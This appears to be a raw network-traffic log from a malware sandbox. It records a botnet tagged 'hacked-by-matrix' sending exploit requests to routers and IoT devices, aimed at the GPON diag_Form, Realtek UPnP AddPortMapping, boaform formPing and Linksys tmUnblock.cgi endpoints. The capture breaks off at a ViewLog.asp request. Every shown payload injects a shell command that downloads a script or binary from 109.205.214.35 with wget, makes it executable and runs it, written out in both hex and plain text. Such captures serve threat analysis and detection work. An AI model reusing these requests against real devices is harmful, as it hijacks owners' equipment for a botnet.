                                                        Mar 21, 2024 05:22:23.526473045 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        441192.168.2.135243093.110.189.1952869
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:24.033410072 CET975OUTPOST /wanipcn.xml HTTP/1.1
                                                        Host: 127.0.0.1:52869
                                                        Content-Length: 630
                                                        Accept-Encoding: gzip, deflate
                                                        SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
                                                        Accept: */*
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
                                                        Connection: keep-alive
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 49 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 2f 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 34 37 34 35 31 3c 2f 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 34 34 33 38 32 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 60 63 64 20 2f 76 61 72 3b 20 72 6d 20 2d 72 66 20 6d 61 74 72 69 78 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 20 2d 4f 20 6d 61 74 72 69 78 3b 20 63 68 6d 6f 64 20 37 37 37 20 6d 61 74 72 69 78 3b 20 2e 2f 6d 61 74 72 69 78 20 72 65 61 6c 74 65 6b 60 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 4e 65 77 45 6e 61 62 6c 65 64 3e 31 3c 2f 4e 65 77 45 6e 61 62 6c 65 64 3e 3c 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 73 79 6e 63 74 68 69 6e 67 3c 2f 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 30 3c 2f 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 3c 2f 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47451</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /var; rm -rf matrix; wget http://109.205.214.35/matrixexp.sh -O matrix; chmod 777 matrix; ./matrix realtek`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>
                                                        Mar 21, 2024 05:22:27.247294903 CET975OUTPOST /wanipcn.xml HTTP/1.1
                                                        Host: 127.0.0.1:52869
                                                        Content-Length: 630
                                                        Accept-Encoding: gzip, deflate
                                                        SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
                                                        Accept: */*
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
                                                        Connection: keep-alive
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 49 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 2f 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 34 37 34 35 31 3c 2f 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 34 34 33 38 32 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 60 63 64 20 2f 76 61 72 3b 20 72 6d 20 2d 72 66 20 6d 61 74 72 69 78 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 20 2d 4f 20 6d 61 74 72 69 78 3b 20 63 68 6d 6f 64 20 37 37 37 20 6d 61 74 72 69 78 3b 20 2e 2f 6d 61 74 72 69 78 20 72 65 61 6c 74 65 6b 60 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 4e 65 77 45 6e 61 62 6c 65 64 3e 31 3c 2f 4e 65 77 45 6e 61 62 6c 65 64 3e 3c 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 73 79 6e 63 74 68 69 6e 67 3c 2f 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 30 3c 2f 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 3c 2f 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47451</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /var; rm -rf matrix; wget http://109.205.214.35/matrixexp.sh -O matrix; chmod 777 matrix; ./matrix realtek`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>
                                                        Mar 21, 2024 05:22:33.392254114 CET975OUTPOST /wanipcn.xml HTTP/1.1
                                                        Host: 127.0.0.1:52869
                                                        Content-Length: 630
                                                        Accept-Encoding: gzip, deflate
                                                        SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
                                                        Accept: */*
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
                                                        Connection: keep-alive
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 49 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 2f 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 34 37 34 35 31 3c 2f 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 34 34 33 38 32 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 60 63 64 20 2f 76 61 72 3b 20 72 6d 20 2d 72 66 20 6d 61 74 72 69 78 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 20 2d 4f 20 6d 61 74 72 69 78 3b 20 63 68 6d 6f 64 20 37 37 37 20 6d 61 74 72 69 78 3b 20 2e 2f 6d 61 74 72 69 78 20 72 65 61 6c 74 65 6b 60 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 4e 65 77 45 6e 61 62 6c 65 64 3e 31 3c 2f 4e 65 77 45 6e 61 62 6c 65 64 3e 3c 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 73 79 6e 63 74 68 69 6e 67 3c 2f 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 30 3c 2f 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 3c 2f 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47451</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /var; rm -rf matrix; wget http://109.205.214.35/matrixexp.sh -O matrix; chmod 777 matrix; ./matrix realtek`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>
                                                        Mar 21, 2024 05:22:45.424676895 CET975OUTPOST /wanipcn.xml HTTP/1.1
                                                        Host: 127.0.0.1:52869
                                                        Content-Length: 630
                                                        Accept-Encoding: gzip, deflate
                                                        SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
                                                        Accept: */*
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
                                                        Connection: keep-alive
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 49 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 2f 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 34 37 34 35 31 3c 2f 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 34 34 33 38 32 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 60 63 64 20 2f 76 61 72 3b 20 72 6d 20 2d 72 66 20 6d 61 74 72 69 78 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 20 2d 4f 20 6d 61 74 72 69 78 3b 20 63 68 6d 6f 64 20 37 37 37 20 6d 61 74 72 69 78 3b 20 2e 2f 6d 61 74 72 69 78 20 72 65 61 6c 74 65 6b 60 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 4e 65 77 45 6e 61 62 6c 65 64 3e 31 3c 2f 4e 65 77 45 6e 61 62 6c 65 64 3e 3c 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 73 79 6e 63 74 68 69 6e 67 3c 2f 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 30 3c 2f 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 3c 2f 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47451</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /var; rm -rf matrix; wget http://109.205.214.35/matrixexp.sh -O matrix; chmod 777 matrix; ./matrix realtek`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>
                                                        Mar 21, 2024 05:23:10.257524014 CET975OUTPOST /wanipcn.xml HTTP/1.1
                                                        Host: 127.0.0.1:52869
                                                        Content-Length: 630
                                                        Accept-Encoding: gzip, deflate
                                                        SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
                                                        Accept: */*
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
                                                        Connection: keep-alive
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 49 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 2f 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 34 37 34 35 31 3c 2f 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 34 34 33 38 32 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 60 63 64 20 2f 76 61 72 3b 20 72 6d 20 2d 72 66 20 6d 61 74 72 69 78 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 20 2d 4f 20 6d 61 74 72 69 78 3b 20 63 68 6d 6f 64 20 37 37 37 20 6d 61 74 72 69 78 3b 20 2e 2f 6d 61 74 72 69 78 20 72 65 61 6c 74 65 6b 60 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 4e 65 77 45 6e 61 62 6c 65 64 3e 31 3c 2f 4e 65 77 45 6e 61 62 6c 65 64 3e 3c 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 73 79 6e 63 74 68 69 6e 67 3c 2f 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 30 3c 2f 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 3c 2f 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47451</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /var; rm -rf matrix; wget http://109.205.214.35/matrixexp.sh -O matrix; chmod 777 matrix; ./matrix realtek`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        442192.168.2.1345014178.159.212.2221723
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:24.855408907 CET282OUTGET /boaform/admin/formPing?target_addr=;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: hacked-by-matrix


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        443192.168.2.1337978178.135.98.821723
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:24.858769894 CET270OUTGET /boaform/admin/formPing?target_addr=;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: hacked-by-matrix
                                                        Mar 21, 2024 05:22:28.015374899 CET270OUTGET /boaform/admin/formPing?target_addr=;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: hacked-by-matrix


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        444192.168.2.1338262172.65.238.4455555
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:25.351373911 CET438OUTPOST /tmUnblock.cgi HTTP/1.1
                                                        Host: 127.0.0.1:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 74 74 63 70 5f 69 70 3d 2d 68 2b 25 36 30 63 64 2b 25 32 46 74 6d 70 25 33 42 2b 72 6d 2b 2d 72 66 2b 7a 65 6e 2e 6d 70 73 6c 25 33 42 2b 77 67 65 74 2b 68 74 74 70 25 33 41 25 32 46 25 32 46 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 25 32 46 6d 70 73 6c 25 33 42 2b 63 68 6d 6f 64 2b 37 37 37 2b 6d 70 73 6c 25 33 42 2b 2e 25 32 46 6d 70 73 6c 2b 6c 69 6e 6b 73 79 73 25 36 30 26 61 63 74 69 6f 6e 3d 26 74 74 63 70 5f 6e 75 6d 3d 32 26 74 74 63 70 5f 73 69 7a 65 3d 32 26 73 75 62 6d 69 74 5f 62 75 74 74 6f 6e 3d 26 63 68 61 6e 67 65 5f 61 63 74 69 6f 6e 3d 26 63 6f 6d 6d 69 74 3d 30 26 53 74 61 72 74 45 50 49 3d 31
                                                        Data Ascii: ttcp_ip=-h+%60cd+%2Ftmp%3B+rm+-rf+zen.mpsl%3B+wget+http%3A%2F%2F109.205.214.35%2Fmpsl%3B+chmod+777+mpsl%3B+.%2Fmpsl+linksys%60&action=&ttcp_num=2&ttcp_size=2&submit_button=&change_action=&commit=0&StartEPI=1


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        445192.168.2.1341642172.65.242.11455555
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:25.439179897 CET438OUTPOST /tmUnblock.cgi HTTP/1.1
                                                        Host: 127.0.0.1:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 74 74 63 70 5f 69 70 3d 2d 68 2b 25 36 30 63 64 2b 25 32 46 74 6d 70 25 33 42 2b 72 6d 2b 2d 72 66 2b 7a 65 6e 2e 6d 70 73 6c 25 33 42 2b 77 67 65 74 2b 68 74 74 70 25 33 41 25 32 46 25 32 46 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 25 32 46 6d 70 73 6c 25 33 42 2b 63 68 6d 6f 64 2b 37 37 37 2b 6d 70 73 6c 25 33 42 2b 2e 25 32 46 6d 70 73 6c 2b 6c 69 6e 6b 73 79 73 25 36 30 26 61 63 74 69 6f 6e 3d 26 74 74 63 70 5f 6e 75 6d 3d 32 26 74 74 63 70 5f 73 69 7a 65 3d 32 26 73 75 62 6d 69 74 5f 62 75 74 74 6f 6e 3d 26 63 68 61 6e 67 65 5f 61 63 74 69 6f 6e 3d 26 63 6f 6d 6d 69 74 3d 30 26 53 74 61 72 74 45 50 49 3d 31
                                                        Data Ascii: ttcp_ip=-h+%60cd+%2Ftmp%3B+rm+-rf+zen.mpsl%3B+wget+http%3A%2F%2F109.205.214.35%2Fmpsl%3B+chmod+777+mpsl%3B+.%2Fmpsl+linksys%60&action=&ttcp_num=2&ttcp_size=2&submit_button=&change_action=&commit=0&StartEPI=1


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        446192.168.2.1354206169.54.227.3080
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:26.226053953 CET435OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 127.0.0.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 176
                                                        Content-Type: application/x-www-form-urlencoded
